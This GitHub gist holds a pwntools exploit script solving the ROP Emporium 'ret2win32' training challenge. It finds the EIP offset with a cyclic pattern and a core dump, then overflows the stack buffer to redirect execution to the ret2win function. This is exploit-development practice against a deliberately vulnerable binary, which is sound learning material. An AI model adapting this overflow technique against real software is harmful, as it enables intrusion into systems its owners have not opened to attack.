Skip to content

Instantly share code, notes, and snippets.

@kkirsche
Created March 28, 2018 20:57
Show Gist options
  • Select an option

  • Save kkirsche/1c6587898eadb4087e93fc6a3fa88319 to your computer and use it in GitHub Desktop.

Select an option

Save kkirsche/1c6587898eadb4087e93fc6a3fa88319 to your computer and use it in GitHub Desktop.
ret2win32 ROP Emporium solution
#!/usr/bin/env python
from pwn import *
from os import remove
# Prepare the binary
context.update(binary='ret2win32', log_level='info')
ret2win_binary = ELF('ret2win32')
# Find our return address
info('locating ret2win address')
ret2win_addr = ret2win_binary.functions.ret2win.address
info('ret2win function address at {a}'.format(a=hex(ret2win_addr)))
eip_addr = p32(ret2win_addr)
buf = cyclic(50)
info('Starting process to location the value of EIP at the crash time')
# Start the elf, and wait for it to be ready for input
p = process(ret2win_binary.path)
# Wait till the process is ready for our input
p.recvuntil('> ')
# Send our exploit
p.sendline(buf)
# Wait for the crash to occur
p.wait()
# The program should have crashed now
info('Loading core dump to identify the cause of the crash')
core = Coredump('core')
eip_val = core.eip
info('EIP contained {v} at the time of the crash'.format(v=hex(eip_val)))
offset = cyclic_find(eip_val)
info('EIP is located at offset {o}'.format(o=int(offset)))
core = None
info('Sending targeted exploit to process')
exploit_buf = 'A'*offset + eip_addr + 'C'*(50-offset-len(eip_addr))
p = process(ret2win_binary.path)
p.recvuntil('> ')
p.sendline(exploit_buf)
p.interactive()
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment